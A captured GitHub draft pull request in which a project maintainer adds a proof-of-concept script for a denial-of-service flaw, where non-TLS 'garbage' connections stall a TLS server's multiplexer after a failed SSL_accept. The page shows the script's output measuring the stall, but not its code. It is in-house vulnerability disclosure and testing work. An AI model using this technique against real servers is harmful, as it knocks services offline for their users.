Skip to content

PoC for TLS server multiplexer stall on failed SSL_accept#9

Draft
nbolton wants to merge 2 commits intomainfrom
poc/tls-dos
Draft

PoC for TLS server multiplexer stall on failed SSL_accept#9
nbolton wants to merge 2 commits intomainfrom
poc/tls-dos

Conversation

@nbolton
Copy link
Copy Markdown
Member

@nbolton nbolton commented Apr 28, 2026
edited
Loading

I found a vulnerability where a TLS server can be DoS'd by a non-TLS client. This PoC proves it.

$ scripts/security/poc/cve_XXXX_XXXXX_tls_dos.py

CVE-XXXX-XXXXX — TLS multiplexer stall on failed SSL_accept
target: 127.0.0.1:24800  stalls: 5

[*] collecting baseline hello rtt (no attack)
  baseline hello rtt: 8 ms
  baseline hello rtt: 5 ms
  baseline hello rtt: 5 ms
  baseline median: 5 ms

[*] firing 5 plaintext garbage connections
[*] measuring hello rtt during attack
  attack hello rtt: 4957 ms

  attack median: 4957 ms
  overhead:      4951 ms (threshold 2500 ms)
[FAIL] multiplexer stalled by 4951 ms — VULNERABLE (CVE-XXXX-XXXXX)

To do

  • Rename PoC script when we have CVE

@nbolton nbolton mentioned this pull request Apr 28, 2026
Merged
@nbolton nbolton requested a review from sithlord48 April 28, 2026 10:50
@nbolton nbolton changed the title feat: add PoC for TLS server multiplexer stall on failed SSL_accept PoC for TLS server multiplexer stall on failed SSL_accept Apr 28, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@sithlord48 sithlord48 Awaiting requested review from sithlord48

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@nbolton